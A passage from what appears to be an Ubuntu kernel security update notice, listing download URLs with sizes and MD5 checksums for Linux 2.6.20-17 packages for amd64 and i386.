http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:    34300 387b7ce88b201bf30fd85094dacce3cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:    38444 30ad6ce1a65789a06c44db484ec2fc40
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:    67682 89f6dd1781e6fbb20cabe9d6e3f00f73
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:    20962 5599c63ef7510aac1462b411a176c961
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:     8328 e32be0998506e928aa8bde678536f738
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:    54578 6eae6d7521ff4f0cb7dc415a12a7eb2c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:    86018 6915f222ab03d798c242b6483499b8d1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:   322570 a9b6d4c17f077f143b34c43afec20f82
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:  1046832 e05164c749d0bf41ac30e373305af62d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:    43974 920cce83c5fe4a05913f7da88ccd31ac
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:    12018 0506e4f214ab149362b54e5bb4cf69ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:    61918 b61a0a87f6fcb62c514dadad3b7ab4e6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:   377838 7a7bc188d85a8963cd573484c411ea81
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb
  Size/MD5:    66658 83ced3e583998815ea676b567d634e1b
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/avm-fritz-kernel-source_3.11+2.6.20.6-17.31_amd64.deb
  Size/MD5:  2131262 4223aeb6ce81e492aefe65f54224c44a
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/fglrx-kernel-source_8.34.8+2.6.20.6-17.31_amd64.deb
  Size/MD5:   217878 3cae80df9595d6b7f74b006ad973763c
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-lowlatency_2.6.20.6-17.31_amd64.deb
  Size/MD5: 13550948 0a272201cfa95745ba7901330809f1fb
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-glx-legacy-dev_1.0.7184+2.6.20.6-17.31_amd64.deb
  Size/MD5:   163996 5c317968914b891bee9324f06196bac0
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-glx-legacy_1.0.7184+2.6.20.6-17.31_amd64.deb
  Size/MD5:  6069522 51ab4ccd9b011259d5d1e38652e7b825
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-kernel-source_1.0.9631+2.6.20.6-17.31_amd64.deb
  Size/MD5:  1860088 159dc95ed774f2500e38614f09bf9df3
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-legacy-kernel-source_1.0.7184+2.6.20.6-17.31_amd64.deb
  Size/MD5:  1384748 40c8107290253b0eaa833e03c269dc26
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/avm-fritz-firmware-2.6.20-17_3.11+2.6.20.6-17.31_amd64.deb
  Size/MD5:   478354 adef863c988defae88838f04655fdfc1
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/fglrx-control_8.34.8+2.6.20.6-17.31_amd64.deb
  Size/MD5:    80422 6fc9d1603c409c335b2c2ba44f709ac0
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-generic_2.6.20.6-17.31_amd64.deb
  Size/MD5: 13537128 459552ec904aa5d19def26cc27f2f268
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-firmware-2.6.20-17-generic-di_2.6.20.6-17.31_amd64.udeb
  Size/MD5:   966300 fdb989c1ea5c525f5d19d428670270bb
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-modules-2.6.20-17-generic-di_2.6.20.6-17.31_amd64.udeb
  Size/MD5:  1942518 37a0f6de40f21cceed0ed442ec0defe4
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx-dev_1.0.9631+2.6.20.6-17.31_amd64.deb
  Size/MD5:   176226 342d5577d90cfaa204c7d6bbe4bde381
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx-new-dev_1.0.9755+2.6.20.6-17.31_amd64.deb
  Size/MD5:   176654 b33320a686ca2b8bf2726902decaa904
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx-new_1.0.9755+2.6.20.6-17.31_amd64.deb
  Size/MD5:  8682258 f78d47759f71aab0cc0cd34688c5be1f
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx_1.0.9631+2.6.20.6-17.31_amd64.deb
  Size/MD5:  7995534 20d837b318cf3fc366508de6def3f67d
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-new-kernel-source_1.0.9755+2.6.20.6-17.31_amd64.deb
  Size/MD5:  2525496 9a28bf56d5d594a60036aad4076a8fb1
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/vmware-player-kernel-modules-2.6.20-17_2.6.20.6-17.31_amd64.deb
  Size/MD5:  1068838 daa14f0e96bc830293c8d33f8ce281d7
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/vmware-server-kernel-modules-2.6.20-17_2.6.20.6-17.31_amd64.deb
  Size/MD5:  1630294 50e4ec261ba923c8141c1be34188b81e
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/vmware-tools-kernel-modules-2.6.20-17_2.6.20.6-17.31_amd64.deb
  Size/MD5:   357824 db0e5a5d2b3168a63ac78661f0f26050
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/xorg-driver-fglrx-dev_7.1.0-8.34.8+2.6.20.6-17.31_amd64.deb
  Size/MD5:   147092 cee36d8e57c8c4308764ccc0eb7f67fb
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/xorg-driver-fglrx_7.1.0-8.34.8+2.6.20.6-17.31_amd64.deb
  Size/MD5:  9822876 d6f3a88b6185f9af8c4fc2c11383516c
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-17-lowlatency_2.6.20-17.36_amd64.deb
  Size/MD5: 23127496 7512c6818a2cfb363e6de96c7a0fd933
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-lowlatency_2.6.20-17.36_amd64.deb
  Size/MD5: 18482084 77c7bb1c7b37a9f180a67a3d4c4c615d

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-386_2.6.20-17.12_i386.deb
  Size/MD5:    86842 188cca44b7e7428066a02673f719eddb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-generic_2.6.20-17.12_i386.deb
  Size/MD5:    87360 e232efb909fa8c310f2c0d7b14ce15d1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-server-bigiron_2.6.20-17.12_i386.deb
  Size/MD5:    87868 f40955e4ca733e6666184c3ca70055e1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-server_2.6.20-17.12_i386.deb
  Size/MD5:    87818 2ca82b0ef30a59b7c44e7859e6391031
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/updates-modules-2.6.20-17-386-di_2.6.20-17.12_i386.udeb
  Size/MD5:    84182 5e576f3aea901f6140d308474a09c6a0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/updates-modules-2.6.20-17-generic-di_2.6.20-17.12_i386.udeb
  Size/MD5:    84886 38236107ff8f5fe920efc4c8279d1964
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:    20326 9164e0834ec52ff52488e431cd540f3a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:    22892 cb6a438e822597816ca22eba4d027117
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:   210082 1114f0c2617cf8a7e7b12307cb7fdcda
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:   212234 b4389be66b9a2de24aa47f1fca764075
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:    88686 2b33f5bf88e9cbccdca938a41d024cf0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:    35624 af9e722096a6e8bb396d9f5bdf2644c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:    37736 0a3798e29dc9017614910743ff71fe86
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:    38408 019a0be0f53df06a8510084404e413cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:    45640 764c449147614d444f5bd809cfe741c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:    45798 8451b700451bc4c3fb1fd436e8aff28e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:   179460 3ee7930d30e01f2d7ac05fe0ad56d675
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:   179826 6bbdde505787788aacad92568ca06b14
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:    32100 3958d982992556c2eea54ac8b0aedf75
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:    32432 369e2795e856b352702be2c90db9460d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:   648592 fef7358c65f78d2f8796780cbec46730
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:   667482 c36df77a008193efc98e7dcfe83cbb46
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:   178208 5eb5a994fb3dc3d429e8e59dfc5ef870
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:   181296 6deb4719a42de6f54f76b83bcec75f80
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:    72396 bc422bb9a10152ab919a8d5232cd3646
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:    74040 91fecfc61f8b9208abbc4b9542ac5751
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:    53576 2f7e777ae61ffd13d738579fc2732d25
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:    54782 f9cb368f9476cb00e5ea50e90fea9cf5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:   129208 2561a2e204d0f0cf1be3fe933c583cd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:   134862 38d76d10a700c21dac765cccb137416d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:   275954 b6e9b4df7533754ccc73f4b74b629b34
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:   274956 94996c553bf55ea5457c588cb5a8d490
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:  1816146 cb9e49c3cf63514cf0e2c8566d34f355
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:  1886462 cdaa4d27814274989b6a5083e99d1468
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-386_2.6.20-17.36_i386.deb
  Size/MD5:   848474 cf3ef71c1ab7b2d98e4165c9c1f50b95
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-generic_2.6.20-17.36_i386.deb
  Size/MD5:   841798 11cc8e6ca8752a4b5aa003256653f673
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-lowlatency_2.6.20-17.36_i386.deb
  Size/MD5:   848690 3849d43f5d59f12f9858efa36c2e63a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-server-bigiron_2.6.20-17.36_i386.deb
  Size/MD5:   844936 b934d25879e62864a5472939edf41804
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-server_2.6.20-17.36_i386.deb
  Size/MD5:   842824 a20ea95041deebdf0f3f78677962c120
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17_2.6.20-17.36_i386.deb
  Size/MD5:  8120852 9cf19d50af64fa5402f5ee0b28f2d8b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-386_2.6.20-17.36_i386.deb
  Size/MD5: 23747822 05e00a5b92c8095dab78c1869f8c5b92
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-generic_2.6.20-17.36_i386.deb
  Size/MD5: 23815004 077ca83a6f88ed749e6f27614c1392a9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-server-bigiron_2.6.20-17.36_i386.deb
  Size/MD5: 24376484 2b4e84bee148e87c0eb01e032552d4eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-server_2.6.20-17.36_i386.deb
  Size/MD5: 23866964 2e4c61c3b57ed209bd4e2e6a81a5ae97
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-386_2.6.20-17.36_i386.deb
  Size/MD5: 23590486 b90067007b1c07dd79d7284497755547
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-generic_2.6.20-17.36_i386.deb
  Size/MD5: 24169290 94ce3aa4d7e7f240e9396b3833d797ed
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-server-bigiron_2.6.20-17.36_i386.deb
  Size/MD5: 25665260 c8e1bd368b1da472152f9fdb024fffbf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-server_2.6.20-17.36_i386.deb
  Size/MD5: 24395356 1291ec15c480d18c926af098dc86d78a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-17.36_i386.deb
  Size/MD5:   669136 984e8b38450985659cdde7c8078f62e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:   244612 c9fe618b2c386c8a0e3b93c700f846d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:   250160 d77ad34335e0332b8ae62f472d04319d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:   132546 04cb386d3b29d3f85d97b08fff95c12b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:   133070 753d1a7b4118661907b670cc93866118
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:   213366 aabe85be12c68a079e03b8781567e506
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:   220780 2e08b3d087dc753bae16ad4b9129f871
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:  1110422 393e5139ecad7796bc8b72ca03a29731
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:  1110530 c36dcc035ef324964739d43ed3730e94
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:  1951210 ceb7460c3af74d76337bd3eceafd18f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:  1974680 62564aa09706a756d9061fc141b0379e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:   149848 85c4f4be8856a6e29743e1a738d2f933
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:   142494 1b4a54e2cd488b1533536e85c0b22d8a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:   160754 761a44199326e79f428f93b9bf1de34b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:   161952 df5dfac32aac66a50b8015b8bbef1d61
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:   252928 9278357037422699cc8d417d831d9719
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:   255510 188e6909c6f36c5e92ee0f780bde1367
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:    32760 a02f028dd76e530920de4164aa1ef686
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:    33328 511c6543e5aa044297a67b62c1c88fa3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:    38018 82accd7c72f15c613cddfb318cddadcb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:    38314 954c2e9d314276f13d499bff665bfde7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:    81850 29805b33afc8664363d142368568df5d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:    82108 96aee6a89a0b04ba3e3760db4ddac78e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:    47686 6ba37e2bf10918c95db76ac2d417663e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:    47708 2ccca5eb028aef1ac3f07078b654e967
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:     8258 28b6853ce133922673a62d68359209d8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:     8496 05daa9534a6d99cd44b17b62109eb39f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:    49948 d5382680a57228bd677edfaece400b3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:    51870 09303feef1283d5b2cc31040af2e5270
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:    78846 438aaabd87a1ea789fc3be3e33ab8646
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:    79490 b0a0f74d52305a342d3bcfb9504181ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:   322546 26c7b5500cea5aa9f4e70f3da2f6fef0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:   322570 0501a223e9a70712006f13d13431659a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:  1362474 f67e3a7dfaa82f5412792bfff3316500
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:  1348042 fb9f6d6ccc587b2113876624bcfef226
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:    42458 84eb68966a8c2dd68c2b4722efb34bde
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:    42232 2c57cdc8bd71b4dce9f1cb1a7308bb52
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:    10762 cead5edaa9fd8608035ea7c71cc7cc7c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:    11400 93ec5d7e1628428ce1d4fabe4ebd49ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:    55992 4e5e603c5574b3b614b92a640d305c77
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:    56890 fca150d57bce6f91574676ce771865ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:   360300 bd62f504c6b28fab113f63a96a8fa2ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:   363212 524d7cfe4ae30d28eb3c2320dd64359c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb
  Size/MD5:    63168 450d97c982ac79e92a1bb2f4560be1ea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb
  Size/MD5:    63836 13f5e0b9090bd7b2866a46f978360142
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/avm-fritz-kernel-source_3.11+2.6.20.6-17.31_i386.deb
  Size/MD5:  3427088 a0644c93a95cbadc3e05a936d07866bf
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/fglrx-kernel-source_8.34.8+2.6.20.6-17.31_i386.deb
  Size/MD5:   217868 bb15afa23bee098b2c73ccabf16aeed0
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-lowlatency_2.6.20.6-17.31_i386.deb
  Size/MD5: 16103192 933fbffa39a9db8812c197356906e8ba
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-glx-legacy-dev_1.0.7184+2.6.20.6-17.31_i386.deb
  Size/MD5:   143102 9323142a37e668ee9f1201250f392f98
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-glx-legacy_1.0.7184+2.6.20.6-17.31_i386.deb
  Size/MD5:  3064282 0566dcf2de8751dee79339a5b7d86d90
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-kernel-source_1.0.9631+2.6.20.6-17.31_i386.deb
  Size/MD5:  1763250 0f0cb7cb6f68759e3052cdad1f1ca473
